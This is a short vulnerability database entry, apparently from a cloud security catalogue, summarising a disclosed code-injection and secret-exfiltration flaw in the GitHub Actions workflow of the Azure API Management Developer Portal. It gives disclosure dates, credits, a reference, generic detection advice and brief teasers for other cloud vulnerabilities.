high

Code Execution in Azure API Management Developer Portal

Published Wed, Dec 11th, 2024

Platforms

azure

Summary

A vulnerability in Azure API Management Developer Portal allows arbitrary code execution and secret exfiltration. The issue stems from a workflow that loads untrusted data from opened issues, potentially allowing attackers to inject malicious commands. This could lead to code execution in the runner, granting access to sensitive tokens and permissions.

Affected Services

API Management Developer Portal

Remediation

None required

Tracked CVEs

No tracked CVEs

References

https://securitylab.github.com/advisories/GHSL-2024-312_Azure_API_Management_Developer_Portal/

Contributed by https://github.com/korniko98

Entry Status

Stub (AI-Generated)

Disclosure Date

Tue, Oct 22nd, 2024

Exploitability Period

Until 2024/11/04

Known ITW Exploitation

-

Detection Methods

Monitor for suspicious activity in GitHub Actions workflows, especially those handling user-supplied data. Review and audit workflows for potential code injection vulnerabilities.

Piercing Index Rating

-

Discovered by

Alvaro Munoz, GitHub Security Lab

More vulnerabilities...

high

ModeLeak: LLM Model Exfiltration Vulnerability in Vertex AI

gcp

A vulnerability in GCP's Vertex AI service allows privilege escalation and unauthorized access to sensitive LLM models. Attackers can exfiltrate these models by exploiting misconfigurations in acce...

Ofir Balassiano, Ofir Shaty...
high

Sketchy Cheat Sheet

gcp

Multiple vulnerabilities were discovered in Google's Cloud Architecture Diagramming Tool, including XSS, unauthorized access to user data, and misconfigured storage buckets. The issues allowed acce...

Jakub Domeracki, Egnyte
high

Issue with data.all Framework Multiple CVEs

aws

Multiple security vulnerabilities were identified in data.all, an open source development framework for building data marketplaces on AWS. The issues affect versions 1.0.0 through 2.6.0 and include...

Amazon Web Services
View all